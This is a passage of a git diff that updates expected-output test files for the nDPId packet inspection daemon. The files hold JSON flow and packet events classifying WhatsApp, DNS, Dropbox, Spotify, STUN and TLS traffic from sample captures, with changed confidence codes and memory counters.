+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1432582399902,"flow_last_seen":1432582425196,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1800,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402667,"flow_last_seen":1432582402667,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip6","src_ip":"fe80::189c:c31b:1298:224","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582396509,"flow_last_seen":1432582426553,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582379543,"flow_last_seen":1432582379571,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1432582379591,"flow_last_seen":1432582399306,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582411561,"flow_last_seen":1432582431565,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582396509,"flow_last_seen":1432582426553,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582379543,"flow_last_seen":1432582379571,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1432582379591,"flow_last_seen":1432582399306,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1432582411561,"flow_last_seen":1432582431565,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402666,"flow_last_seen":1432582402666,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1432582377898,"flow_last_seen":1432582377898,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1432582381179,"flow_last_seen":1432582385071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18995,"flow_avg_l4_payload_len":431,"midstream":1,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1432582377898,"flow_last_seen":1432582377898,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1432582381179,"flow_last_seen":1432582385071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18995,"flow_avg_l4_payload_len":431,"midstream":1,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","packets-captured":93,"packets-processed":93,"total-skipped-flows":0,"total-l4-payload-len":24799,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":51,"global_ts_msec":1432582431565} ~~~~~~~~~~~~~~~~~~~~ SUMMARY 
~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 93/93 @@ -57,9 +57,9 @@ ~~ total active/idle flows...: 9/9 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5886624 bytes -~~ total memory freed........: 5886624 bytes -~~ total allocations/frees...: 118237/118237 +~~ total memory allocated....: 6020258 bytes +~~ total memory freed........: 6020258 bytes +~~ total allocations/frees...: 120999/120999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 475 chars ~~ json string max len.......: 2420 chars diff --git a/test/results/whatsapp_voice_and_message.pcap.out b/test/results/whatsapp_voice_and_message.pcap.out index 3d950a900..d60e7e3ff 100644 --- a/test/results/whatsapp_voice_and_message.pcap.out +++ b/test/results/whatsapp_voice_and_message.pcap.out 
@@ -4,80 +4,80 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432820558921,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820558921,"pkt":"ABoRAAACABoRAAABCABFAAA89o5AAEAGzkgKCAABuK2zLoqYAbsGFK3rAAAAAKACOQj9WQAAAgQFtAQCCAoABFtlAAAAAAEDAwQ="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432820558982,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820558982,"pkt":"ABoRAAACABoRAAABCABFAAAoAAJAABAG9Om4rbMuCggAAQG7ipj561IUBhSt7FAS\/\/+tmQAA"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432820558982,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820558982,"pkt":"ABoRAAACABoRAAABCABFAAAo9o9AAEAGzlsKCAABuK2zLoqYAbsGFK3s+etSFVAQOQh0kgAA"} 
-00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820558921,"flow_last_seen":1432820559129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432820559129,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820558921,"flow_last_seen":1432820559129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432820559129,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567259,"flow_last_seen":1432820567259,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820567259,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432820567259,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820567259,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARvE0KCAABHw1UMNF0DZYAhk4lAAMAaiESpEIAANFg4Ox4XqyZamxAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567259,"flow_last_seen":1432820567259,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820567259,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567259,"flow_last_seen":1432820567259,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820567259,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432820567597,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432820567597,"pkt":"ABoRAAACABoRAAABCABFAABIAA5AABAR7VEfDVQwCggAAQ2W0XQANI6xAQMAGCESpEIAANFg4Ox4XqyZamwAIAAIAAHzk56wzx5AAgAIAAABTZrCzrs="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1432820567597,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820567597,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARvE0KCAABHw1UMNF0DZYAhk4lAAMAaiESpEIAANFg4Ox4XqyZamxAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567917,"flow_last_seen":1432820567917,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820567917,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1432820567917,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820567917,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARxk0KCAABHw1KMNF0DZYAhknAAAMAaiESpEIAABwXmwtuMPN7N0hAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567917,"flow_last_seen":1432820567917,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820567917,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567917,"flow_last_seen":1432820567917,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820567917,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1432820568117,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432820568117,"pkt":"ABoRAAACABoRAAABCABFAABIABBAABAR908fDUowCggAAQ2W0XQANMmPAQMAGCESpEIAABwXmwtuMPN7N0gAIAAIAAGyFZ6wzx5AAgAIAAABTZrC0PY="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1432820568118,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820568118,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARxk0KCAABHw1KMNF0DZYAhknAAAMAaiESpEIAABwXmwtuMPN7N0hAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820568346,"flow_last_seen":1432820568346,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820568346,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1432820568346,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820568346,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEAR0E0KCAABHw1AMNF0DZYAhjyrAAMAaiESpEIAAKkWq28lYULzqlFAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820568346,"flow_last_seen":1432820568346,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820568346,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820568346,"flow_last_seen":1432820568346,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820568346,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1432820568646,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432820568646,"pkt":"ABoRAAACABoRAAABCABFAABIABJAABARAU4fDUAwCggAAQ2W0XQANK\/IAQMAGCESpEIAAKkWq28lYULzqlEAIAAIAAG83p6wzx5AAgAIAAABTZrC0t8="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1432820568646,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820568646,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEAR0E0KCAABHw1AMNF0DZYAhjyrAAMAaiESpEIAAKkWq28lYULzqlFAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820568947,"flow_last_seen":1432820568947,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820568947,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
